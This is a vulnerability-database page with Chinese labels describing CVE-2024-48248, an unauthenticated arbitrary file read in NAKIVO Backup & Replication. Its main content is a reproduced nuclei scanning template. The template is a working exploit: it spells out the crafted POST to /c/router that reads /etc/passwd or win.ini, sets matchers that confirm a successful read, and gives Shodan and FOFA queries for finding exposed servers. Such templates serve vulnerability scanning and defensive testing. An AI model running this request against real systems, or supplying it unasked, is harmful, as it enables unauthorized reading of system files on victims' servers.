CVE-2024-48248: NAKIVO Backup and Replication Solution - Unauthenticated Arbitrary File Read

日期: 2025-08-01 | 影响软件: NAKIVO Backup and Replication Solution | POC: 已公开

漏洞描述

NAKIVO Backup & Replication is a data protection solution used for backing up and restoring virtualized and physical environments. A vulnerability has been identified in certain versions of NAKIVO Backup & Replication that allows an unauthenticated attacker to read arbitrary files on the underlying system.

PoC代码[已公开]

id: CVE-2024-48248

info:
  name: NAKIVO Backup and Replication Solution - Unauthenticated Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    NAKIVO Backup & Replication is a data protection solution used for backing up and restoring virtualized and physical environments. A vulnerability has been identified in certain versions of NAKIVO Backup & Replication that allows an unauthenticated attacker to read arbitrary files on the underlying system.
  reference:
    - https://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248/
  classification:
    epss-score: 0.93989
    epss-percentile: 0.99882
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"NAKIVO"
    fofa-query: title="NAKIVO"
  tags: cve,cve2024,nakivo,backup,lfi,kev,vkev

variables:
  string: "{{to_lower(rand_base(5))}}"

http:
  - raw:
      - |
        POST /c/router HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: keep-alive
        Content-Type: application/json

        {"action": "STPreLoadManagement", "data": ["{{path}}"], "method": "getImageByPath", "sid": "", "tid": "{{string}}", "type": "{{string}}"}

    payloads:
      path:
        - /etc/passwd
        - C:/windows/win.ini

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        name: linux
        dsl:
          - "regex('114,111,111,116,58,.*,58,48,58,48,58', body)"
          - "contains(body, 'STPreLoadManagement')"
          - "status_code == 200"
        condition: and

      - type: dsl
        name: windows
        dsl:
          - "contains(body, '59,32,102,111,114')"
          - "contains(body, 'STPreLoadManagement')"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502202012485f7ca5a4326745669950355b16b563fa59233d9bea5d10a19821d68d5c022100ded7e6ee1f5d926efbb1c7d82c1040d9291302eae1abe49ab3216dadd5385332:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-48248.yaml